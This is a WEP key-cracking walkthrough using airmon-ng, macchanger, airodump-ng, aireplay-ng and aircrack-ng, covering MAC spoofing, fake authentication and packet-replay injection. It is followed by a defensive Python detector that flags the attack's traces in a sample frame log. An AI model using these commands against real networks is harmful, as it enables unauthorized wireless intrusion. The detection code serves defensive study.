Preparation
1. Stop the wireless adapter (wlan0):
airmon-ng stop wlan0
2. Change the MAC address:
macchanger --mac 00:11:22:33:44:55 wlan0
3. Start the wireless adapter:
airmon-ng start wlan0
This will create a mon0 interface that is used from now on.
Attack
1. Identify the MAC address (BSSID), channel (CH) and name (ESSID) of the target network:
airodump-ng mon0
2. Start the packet capture:
airodump-ng -c [channel] -w /tmp/capture --bssid [bssid] mon0
3. Associate with the AP (in another terminal window):
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] mon0
If this succeeds, you should see something like:
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)
4. Start injecting packets to speed things up (in another terminal window):
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 mon0
Check the packet capture window; the #Data field should now be increasing. Once enough packets have been captured you can proceed to cracking the key. Run the cracking in parallel with the packet capture, so that if the cracking process fails you can keep gathering data and try again later. I run the cracking command every 10k IVs starting at 20k IVs.
Cracking
Attempt to crack the key:
aircrack-ng -n 128 -b [bssid] /tmp/capture-01.cap
If cracking fails, try running it again after you've captured 10k more packets.
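From the defender's side, the procedure above leaves two visible traces in a wireless frame log: a station repeating authentication/association requests, and the same station emitting hundreds of same-sized data frames per second once the replay injection starts. This added Python example (not part of the original walkthrough) runs both checks over a constructed, simplified frame log; the record layout (time, source MAC, subtype, body length), the station MACs other than the spoofed one above, and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample of simplified 802.11 frame records: (time_s, src_mac, subtype, body_len).
# Not real capture data. The replay burst mimics what the AP sees during injection: one
# station sending ~300 identical-size data frames per second, far above a normal client.
ATTACKER = "00:11:22:33:44:55"  # the spoofed MAC used in the walkthrough above
NORMAL = "aa:bb:cc:00:00:01"    # assumed ordinary client
FRAMES = (
    [(0.0, NORMAL, "auth", 0), (0.1, NORMAL, "assoc", 0)]                        # one ordinary join
    + [(0.0 + i * 0.5, NORMAL, "data", 300 + 40 * i) for i in range(4)]           # light, varied traffic
    + [(1.0, ATTACKER, "auth", 0), (1.1, ATTACKER, "assoc", 0)] * 4               # repeated fake auth
    + [(2.0 + i * 0.003, ATTACKER, "data", 68) for i in range(300)]               # replay burst
)


def peak_data_rate(frames, window_s=1.0):
    """Highest number of data frames each station sent inside any window_s-second sliding window."""
    by_station = defaultdict(list)
    for t, src, subtype, _ in frames:
        if subtype == "data":
            by_station[src].append(t)
    peaks = {}
    for src, times in by_station.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:   # slide the window start forward
                start += 1
            best = max(best, end - start + 1)
        peaks[src] = best
    return peaks


def flag_replay_injection(frames, max_fps=50, window_s=1.0):
    """Stations whose peak data-frame rate exceeds max_fps (assumed threshold)."""
    return sorted(src for src, peak in peak_data_rate(frames, window_s).items() if peak > max_fps)


def flag_repeated_association(frames, max_attempts=2):
    """Stations that sent more auth/assoc requests than a single join needs (assumed limit)."""
    counts = defaultdict(int)
    for _, src, subtype, _ in frames:
        if subtype in ("auth", "assoc"):
            counts[src] += 1
    return sorted(src for src, n in counts.items() if n > max_attempts)


if __name__ == "__main__":
    print("replay injection suspects:", flag_replay_injection(FRAMES))
    print("repeated association suspects:", flag_repeated_association(FRAMES))
```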